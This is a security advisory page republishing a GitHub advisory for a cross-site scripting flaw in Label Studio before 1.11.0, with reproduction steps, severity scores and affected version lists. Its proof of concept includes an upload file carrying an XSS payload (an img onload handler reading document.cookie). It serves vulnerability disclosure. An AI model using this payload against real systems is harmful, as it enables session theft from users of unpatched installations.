Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS02eHY5LTk1N2otcWZoZ84AA5dt

Label Studio vulnerable to Cross-site Scripting if `<Choices>` or `<Labels>` are used in labeling config

Summary

On all Label Studio versions prior to 1.11.0, data imported via file upload feature is not properly sanitized prior to being rendered within a Choices or Labels tag, resulting in an XSS vulnerability.

Details

Need permission to use the "data import" function. This was reproduced on Label Studio 1.10.1.

PoC

  1. Create a project.
    Create a project

  2. Upload a file containing the payload using the "Upload Files" function.
    2  Upload a file containing the payload using the Upload Files function
    3  complete

The following are the contents of the files used in the PoC

{
  "data": {
    "prompt": "labelstudio universe image",
    "images": [
      {
        "value": "id123#0",
        "style": "margin: 5px",
        "html": "<img width='400' src='https://labelstud.io/_astro/images-tab.64279c16_ZaBSvC.avif' onload=alert(document.cookie)>"
      }
    ]
  }
}
  1. Select the text-to-image generation labeling template of Ranking and scoring
    3  Select the text-to-image generation labelling template for Ranking and scoring
    5  save

  2. Select a task
    4  Select a task

  3. Check that the script is running
    5  Check that the script is running

Impact

Malicious scripts can be injected into the code, and when linked with vulnerabilities such as CSRF, it can cause even greater damage. In particular, It can become a source of further attacks, especially when linked to social engineering.

Permalink: https://github.com/advisories/GHSA-6xv9-957j-qfhg
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02eHY5LTk1N2otcWZoZ84AA5dt
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 9 months ago
Updated: 9 months ago


CVSS Score: 4.7
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Identifiers: GHSA-6xv9-957j-qfhg, CVE-2024-26152
References: Repository: https://github.com/HumanSignal/label-studio
Blast Radius: 7.5

Affected Packages

pypi:label-studio
Dependent packages: 1
Dependent repositories: 39
Downloads: 63,707 last month
Affected Version Ranges: < 1.11.0
Fixed in: 1.11.0
All affected versions: 0.4.1, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.5.0, 0.5.1, 0.6.0, 0.6.1, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.9.1, 1.0.0, 1.0.1, 1.0.2, 1.1.0, 1.1.1, 1.4.1, 1.5.0, 1.6.0, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.8.0, 1.8.1, 1.8.2, 1.9.0, 1.9.1, 1.9.2, 1.10.0, 1.10.1
All unaffected versions: 1.11.0, 1.12.0, 1.12.1, 1.13.0, 1.13.1, 1.14.0